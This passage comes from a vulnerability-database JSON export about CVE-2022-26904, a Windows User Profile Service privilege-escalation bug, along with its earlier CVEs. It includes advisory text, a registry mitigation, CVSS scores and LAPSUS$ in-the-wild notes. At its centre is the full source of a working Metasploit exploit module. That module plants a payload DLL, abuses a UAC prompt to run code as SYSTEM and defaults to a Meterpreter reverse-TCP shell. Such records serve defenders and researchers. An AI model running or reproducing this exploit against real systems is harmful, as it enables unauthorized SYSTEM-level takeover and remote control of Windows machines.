utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will run the `consent.exe` program to run. If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. They must also have a profile under `C:\\Users` for the exploit to function in its current state. There has been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-15T00:00:00", "id": "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:35:15", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-05-27T18:33:40", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privlege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-27T14:46:02", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21919", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:50", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21919.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-01-11T08:00:00", "id": "MS:CVE-2022-21895", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21895", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:45:22", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T08:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-12T08:00:00", "id": "MS:CVE-2022-26904", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:53", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:20:31", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:15:00", "type": "cve", "title": "CVE-2022-21919", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895", "CVE-2022-21919"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server:20h2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server:2022", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-21919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-21919", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", 